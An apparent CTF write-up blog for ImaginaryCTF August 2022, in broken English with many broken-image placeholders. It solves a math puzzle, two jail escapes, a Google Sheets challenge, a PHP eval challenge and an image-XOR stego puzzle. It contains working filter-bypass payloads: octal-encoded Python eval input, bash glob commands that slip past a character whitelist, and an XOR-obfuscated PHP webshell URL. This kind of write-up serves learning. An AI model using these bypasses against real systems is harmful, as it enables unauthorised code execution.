ICTF August 2022

tags: ctf forensic coding linux

Cheers up for my mind and anybody read that WU or blog, so i just want to share some experiences on make save on my mind for challenge and question about ICTF, cool stuffs and pretty strange

Misc

Comment: In this month, Misc have some strange questions but it really really fun, not just hack , but also programing, do regex to prevent typing and it will be some true things u will meet on real web or application u use.

cos2 (30pts) - 04/08

Description:
What is the cosine of 42 radians, rounded to 100 decimal places? Wrap your flag in ictf{}

So it just the math question, the most hard of question in the place how to we get the rounded to 100 decimal places, so it just kind we do some research on the working on your programing languagues. So with me i choose python so i do reasearh and get the flag. Eazy right

Some answer for doing with this tasks . It working for python and do fast with the lib so try hard if you want do it with yourseft.

import decimal
from sympy import cos

print(cos(42).evalf(100))

d = decimal.Decimal(str(cos(42).evalf(100)))
print(abs(d.as_tuple().exponent)) 

Flag: ictf(-0.3999853149883512939547073371772020283804228791424190606167446601513424425835587794388549191368621883)

ictf solve:

from mpmath import mp
mp.dps = 100
print(f"ictf{{{str(mp.cos(42))}}}")

_ (75pts) - 16/08

Description
There's this new place I found, but you can't get in with any letters. Think you can find the flag? Flag is in flag.txt.

Attachments
https://imaginaryctf.org/f/K3b4S#_.py nc puzzler7.imaginaryctf.org 4005

This is the first of challenge on my struggle week

• First of all, we have the python code, the target of author want to spoil something the method for active on server like pwn but not binary we got the python and find the payload comfort for condition of python want to say

from builtins import open as _, input as _a, print as _b, eval as _c
from unicodedata import normalize as _d
from re import search as _e

if _e("[\\101-\\132\\141-\\172]", __:=_d("\116\106\113\104", _a(_("_").read()))):
    _b("|\\|0 3|\\|+|2`/")
    ______________________
_b(_c(__))

• So we just know how about the open, input, print, eval that basic function we will meet and actually meet on the anything python code for making coversation with client and files on the local desktop.

• Secondly, we see the normalize that the problem for this code, eval will represent to convert the octa form to ascII form, so we need know what the if condition tell, about

  • _e("[\\101-\\132\\141-\\172]", the heck what this, calm down it just the trick the author want to say _e is represent for search function and it do what exacly this tell, find on the string or input the things like that LOL. So we can know the things it octa say, so drop for tools for convert that for me link and we get A-Z a-z, this say ah i will find the input your with the regex if it input not like regex i will pass you can do what actually u want
  • And yeah that actually do with input typing we need to recover the function if which so complicate with _a,_b,… and we need to get easy to know that on the readable we can like
  ​​​​if search("[A-z a-z]", __:=normalize("NFKD",             input(open("_").read()))):
  ​​​​print("|\\|0 3|\\|+|2`/")
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  • with normalize with type NFKD it change the composing or decomposing characters, it like change this input shade i think like combine or destroy that it kind little bit hard to know so it function add to make the if condition became complex so skip it and know that like change the shape of string input
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • So the what we need is input something to that know what payload it is comfort for that condition and we will get the flag or not we will be kick out to server
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
    . That is all of flag we need to cover to octa
  ​​​​exec('__ = 1\nprint(__)') =      "\145\170\145\143\050\047\137\137\040\075\040\061\134\156\160\162\151\156\164\050\137\137\051\047\051"
  ​​​​1 + 3 = "\061\053\063"
  ​​​​flag.txt = "\146\154\141\147\056\164\170\164"
  ​​​​open('flag.txt').read() = "\157\160\145\156\050\047\146\154\141\147\056\164\170\164\047\051\056\162\145\141\144\050\051"
  

  • i do some payload above but didn't work anything and the only one the payload is success or accept like this _("\146\154\141\147\056\164\170\164") it like we need to do open the flag because _ is the acceptable syntax so do it with server and i receive
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • so we can't read the file but we can do knowing a flag exist and storage in flag.txt same as directory if we want to flag we need to read this but it have letters so we need to find that and after writeup i know something like https://www.tutorialspoint.com/How-does-operator-work-on-list-in-Python and that is the last items to change the landscape.
  • The star(*) operator unpacks the sequence/collection into positional arguments. So if you have a list and want to pass the items of that list as arguments for each position as they are there in the list, instead of indexing each element individually, you could just use the * operator. that we we need to combine the * with above payload and place it on tuple or list to do what exactly we need like
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • So we need to read do that tuple or list and we will do the things on that not need to read. It will bypass through eval function, quite leak on python and now i know new skill.

• Thirdly, do what we know to find the flag with payload like (*_("\146\154\141\147\056\164\170\164"), ) or [*_("\146\154\141\147\056\164\170\164"), ]
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

• Hard thing but fun

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  . Do you ?

BC Jail (75pts) - 21/08

Description
We've had some hard jail challenges(nameless & stackless). Time for some easy jail!
Note: The flag is the name of the flag file + the contents of this file. The flag filename is 22 characters long.

Attachments
nc puzzler7.imaginaryctf.org 4008

• Before start chall, i have do some research with BC or nameless & stackless and got something like
  • Stackless
  • nameless
• Some let do netcat and look what we got

Welcome to Jail You can't escape!
----------
#!/usr/bin/env python3
import os
print("Welcome to Jail You can't escape!")
print('-'*10)
print(open(__file__).read())
print('-'*10)
while True:
    x = input(">>> ")
    whitelist = "/bc? "
    if any([i for i in x if i not in whitelist]):
        print("I see you are trying to hack, Exiting!")
        exit(0)
    else:
        os.system(x)
----------

• One time in this month ictf want to participant solve the chall with regex and it more difficult than above chall, huh
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  what can i do?
• With the range of BC jail have only B C and jail(/)
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  so i not solve that and just read WU because i don't know what this mean. So let do this chall with my knowledge base on WU. Okay
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

Once you connect to the server, you get the source code. Reading it, we can
see we are allowed to use only the characters /bc? . So, we start playing
around with bash, we see that ? is very helpful(/b?? == /bin). We can use
(/b??/?c?? == /bin/echo) and then use ? for flag file(for example /b??/?c??
??????? will print the file name jail.py(because of the length) hence /b??/?
c?? ?????????????????????? will print the file name (ictf{bre4k1ng_7he_j41l)
and then to read it do the same method but except for echo use cat
(/b??/c??) and you'll get the flag.

• I think it is guessing and we need to try what the syntax is acceptable on this server and yeah they find ? is useful with (/b?? == /bin). Huh
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  yeah that actually cool stuff because on ly ? can bypass the rule of server, so they actually do that with just bc? and / and like that they can say /c?? is cat and ? will represent for the length of the file like

>>> /b??/c?? ???????
#!/usr/bin/env python3
import os
print("Welcome to Jail You can't escape!")
print('-'*10)
print(open(__file__).read())
print('-'*10)
while True:
    x = input(">>> ")
    whitelist = "/bc? "
    if any([i for i in x if i not in whitelist]):
        print("I see you are trying to hack, Exiting!")
        exit(0)
    else:
        os.system(x)>>>

• so we can know the ? is represent to the name or alphatbet to create a file with lenth ? = lenth name of file and that we can see the thing we want by typing ? for the file u actually want and on description they said the name of file have 22 length so 22 ? will get content the file

>>> /b??/c?? ??????????????????????
_like_4_b0ss!}

• so we need the file name i think in linux if we want to see the name of file we need to typing name almost the same and it will return the actually name of file with echo and /b??/?c?? ??? is represent for echo

>>/b??/?c?? ??????????????????????
/bin/zcat /bin/zcmp ictf{bre4k1ng_7he_j41l

• Flag: ictf{bre4k1ng_7he_j41l_like_4_b0ss!}
• So do it with your linux ? represent is actually work, it just linux challenge but idk what ? is actually exist so that is new tech i need to learn. Do you like it ?
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

Web

Comment: In this month, i think the web is not hard with myself but puzzling is the one characteristic we need to say about that Web challeges.

Fake Flag Database (50pts) - 22/08

We use fake flags a lot, so I've started documenting them, just so no one gets them confused with real flags. There's absolutely no real flags here, and certainly no reason to go searching for one.

Attachments
https://docs.google.com/spreadsheets/d/1ffGO9YKQbMv7f00hFN4C-UFzYghPyk9Bk3Pq7dfmA/edit?usp=sharing

• that is quite fun challenge with search on the excel table on google and u find the payload like this

This was supposed to be a challenge based on https://blog.andrewcantino.com/blog/2019/01/27/why-security-expectations-matter-google-sheets-hidden-content/, but apparently Google fixed it?

In any case, the first cell on the first sheet is always shown in the source, so simply grepping for the flag gives the flag.

curl https://docs.google.com/spreadsheets/d/1ffGO9Y_KQbMv7_f00hFN4C-UFzYghPyk9Bk3Pq7dfmA/edit#gid=1335776287 | grep -oP ictf{.*?}

• It the method to solve this but with me i find something on the table like this command because the google form is not permit so i can show u how i find it but it command on excel like this =IMPORTRANGE("1ffGO9Y_KQbMv7_f00hFN4C-UFzYghPyk9Bk3Pq7dfmA"; "Backend!B:B") and it got the fake flag so do with create new sheet and do with A column or C column because it will storage on that, it just guessy but it will like that so change that =IMPORTRANGE("1ffGO9Y_KQbMv7_f00hFN4C-UFzYghPyk9Bk3Pq7dfmA"; "Backend!A:A") and yeah we can get the flag like this
  
• Flag: ictf{nothing_is_hidden_nothing_is_safe}

phpsucks (75pts) - 29/08

Description
I have an eval but with a robust user input validation.

Attachments
http://puzzler7.imaginaryctf.org:4011/

So first of all, access the web and see what the web say

• Firstly, it use php language and yeah that is the good new to solve that, and with wappalyzer i know the version of php is 7.4.30 and that all the infomation i find with chall.
• Secondly, Analysis the coding, we knew:
  • We need to do secret_function() and we will get the flag
  • And it have parameter to pass is cmd so we just add route /?cmd= "content what you typing".
  • We need to know the one thing is if condition and it check the regex, so again we back regex and now it on php and again we meet eval() What concident in this month !
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
    . We pass we get flag we not pass we get the try harder !!
• So thanks for s1lver8ulle7, find this thing and it the point to solving this chall call bypass waf php webshell
  
• So with bypass waf php webshell, the theory is really basic because it deny the numberic or words so we just use symbol and the thing to do that we can do the xor because u need to know the eval function can perform math operations and so we need convert the secret_function to symbol and do xor on url and yeah we can find the flag, just not miss assign it with to call that $function.
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  with php complier
• So easy way to do that is xor with _ is the best way to convert all of that to symbol shape because if we do the ?< it will convert number and word and it just the err will occur
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• So do it like this and yeah perfect
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  
  but it fail because it just contain secret not contain _ function so we need to find other, it the hard way to find this. Yeah i stuck on this but with WU i find some like this _____/}=_@_/@@. and it save mind
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  
  Perfectly so we assign what for the function and call that because the type we passing to url is string and not to cat with () so we need to assign and call that it will actually work with that type.
  
• Exploit that web with that payload http://puzzler7.imaginaryctf.org:4011/?cmd=$_=%27,:%3C-:[%22[*.%3C[)/@%27^%22_____/}=@/@@.%22;$_();

Flag: ictf{th3r3_4r3_n0_l4ngu4g3_l1k3_Php}

Forensics/crypto

Shady Penguins (75pts) - 20/08

Description
Roo has spotted some shady Penguins passing files to each other and finally got his paws on a pair. What are these Penguins up to?

Attachments
https://imaginaryctf.org/f/jJH2d#Spy https://imaginaryctf.org/f/wooKe#Penguins

It quite littebit easy chall, so we need to read what actually mean of decripstion is talk, it say we got the the pair of the paw of penguige what this mean not concident if why got 2 of image tell something.

• So i use HxD to see the hexditor because it not a file can open
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Look on the the hex of 2 file i read something
  • it the png file and yeah it had same header like
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • if i do it binwalk i think it will return the same size between them and yeah actually it does
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • So i think the thing we need to do is combine or xor image and what different because it have same thing on that but not see actually on naked eye so use stegsolve to cause magic
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
    
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
    
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
    
    The new magic actually occur and yeah on the middle of image we get the flag
    
    Flag ictf{visual_crypto_is_neato}

Sum up: Yeah, that all chall i do and write blog something about that, quite fun, new skill and new err. Haha so i will be back on next month and hope u can learn something greate from this. Peace

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

. And little one thing i will solve the hardest forensics i see on ctf contest yeah it on series ictf but on the other blog so look at this

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →